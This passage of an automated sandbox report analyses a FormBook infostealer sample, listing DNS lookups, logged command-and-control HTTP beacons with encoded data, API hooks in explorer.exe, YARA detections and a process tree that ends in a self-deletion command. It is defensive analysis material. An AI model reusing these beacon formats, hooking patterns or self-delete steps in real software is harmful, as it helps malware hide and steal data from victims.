                                          Nov 27, 2020 06:36:48.373967886 CET5926153192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:48.409102917 CET53592618.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:49.397313118 CET5715153192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:49.432845116 CET53571518.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:49.880383968 CET5941353192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:49.907641888 CET53594138.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:53.477510929 CET6051653192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:53.519870996 CET53605168.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:04.756514072 CET5164953192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:05.704509974 CET53516498.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:22.738609076 CET6508653192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:22.765702009 CET53650868.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:23.996509075 CET5643253192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:24.023689032 CET53564328.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:25.893688917 CET5292953192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:25.942146063 CET53529298.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:26.103823900 CET6431753192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:26.162023067 CET53643178.8.8.8192.168.2.5
                                          Nov 27, 2020 06:37:46.346628904 CET6100453192.168.2.58.8.8.8
                                          Nov 27, 2020 06:37:46.497160912 CET53610048.8.8.8192.168.2.5
                                          Nov 27, 2020 06:38:07.318126917 CET5689553192.168.2.58.8.8.8
                                          Nov 27, 2020 06:38:07.721736908 CET53568958.8.8.8192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Nov 27, 2020 06:37:04.756514072 CET192.168.2.58.8.8.80x7fe5Standard query (0)www.asojebu.comA (IP address)IN (0x0001)
                                          Nov 27, 2020 06:37:26.103823900 CET192.168.2.58.8.8.80x74cStandard query (0)www.haircuressteampod.comA (IP address)IN (0x0001)
                                          Nov 27, 2020 06:37:46.346628904 CET192.168.2.58.8.8.80xe6baStandard query (0)www.porncamslivechat.comA (IP address)IN (0x0001)
                                          Nov 27, 2020 06:38:07.318126917 CET192.168.2.58.8.8.80x5dadStandard query (0)www.amarilloautoexpress.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Nov 27, 2020 06:37:05.704509974 CET8.8.8.8192.168.2.50x7fe5Name error (3)www.asojebu.comnonenoneA (IP address)IN (0x0001)
                                          Nov 27, 2020 06:37:26.162023067 CET8.8.8.8192.168.2.50x74cName error (3)www.haircuressteampod.comnonenoneA (IP address)IN (0x0001)
                                          Nov 27, 2020 06:37:46.497160912 CET8.8.8.8192.168.2.50xe6baNo error (0)www.porncamslivechat.comporncamslivechat.comCNAME (Canonical name)IN (0x0001)
                                          Nov 27, 2020 06:37:46.497160912 CET8.8.8.8192.168.2.50xe6baNo error (0)porncamslivechat.com184.154.50.243A (IP address)IN (0x0001)
                                          Nov 27, 2020 06:38:07.721736908 CET8.8.8.8192.168.2.50x5dadNo error (0)www.amarilloautoexpress.com23.27.109.19A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.porncamslivechat.com
                                          • www.amarilloautoexpress.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549746184.154.50.24380C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 27, 2020 06:37:46.629072905 CET5535OUTGET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.porncamslivechat.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 27, 2020 06:37:48.018973112 CET5536INHTTP/1.1 404 Not Found
                                          Date: Fri, 27 Nov 2020 05:37:46 GMT
                                          Server: Apache
                                          Link: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Set-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Referrer-Policy: no-referrer-when-downgrade
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73
                                          Data Ascii: 3d48<!doctype html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="apple-touch-icon" href="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/icon.png"><link rel="stylesheet" href="http://porncamslivechat.com/wp-content/cache/minify/2f682.css" media="all" /><link rel="pingback" href="http://porncamslivechat.com/xmlrpc.php" />...[if lt IE 9]><script src="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/js/html5.js" type="text/javascript"></script><![endif]--><script src="http://porncamslivechat.com/wp-content/cache/minify/bffd0.js"></script>... This site is optimized with the Yoast SEO plugin v15.3 - https://yoast.com/wordpress/plugins/s


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.54974723.27.109.1980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 27, 2020 06:38:07.894825935 CET5550OUTGET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.amarilloautoexpress.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 27, 2020 06:38:08.068506002 CET5551INHTTP/1.1 200 OK
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                          X-Powered-By: Nginx
                                          Date: Fri, 27 Nov 2020 05:38:20 GMT
                                          Connection: close
                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                          Data Ascii: 3


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEA
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEA

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: emthree.exe PID: 4600 Parent PID: 5660

                                          General

                                          Start time:06:36:03
                                          Start date:27/11/2020
                                          Path:C:\Users\user\Desktop\emthree.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\emthree.exe'
                                          Imagebase:0xf40000
                                          File size:459776 bytes
                                          MD5 hash:25B5788669A3A8F35596CE975F0823A7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Analysis Process: emthree.exe PID: 5772 Parent PID: 4600

                                          General

                                          Start time:06:36:10
                                          Start date:27/11/2020
                                          Path:C:\Users\user\Desktop\emthree.exe
                                          Wow64 process (32bit):true
                                          Commandline:{path}
                                          Imagebase:0x460000
                                          File size:459776 bytes
                                          MD5 hash:25B5788669A3A8F35596CE975F0823A7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3472 Parent PID: 5772

                                          General

                                          Start time:06:36:12
                                          Start date:27/11/2020
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: rundll32.exe PID: 6240 Parent PID: 3472

                                          General

                                          Start time:06:36:25
                                          Start date:27/11/2020
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                          Imagebase:0xac0000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: cmd.exe PID: 6256 Parent PID: 6240

                                          General

                                          Start time:06:36:29
                                          Start date:27/11/2020
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\emthree.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 6264 Parent PID: 6256

                                          General

                                          Start time:06:36:30
                                          Start date:27/11/2020
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff797770000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >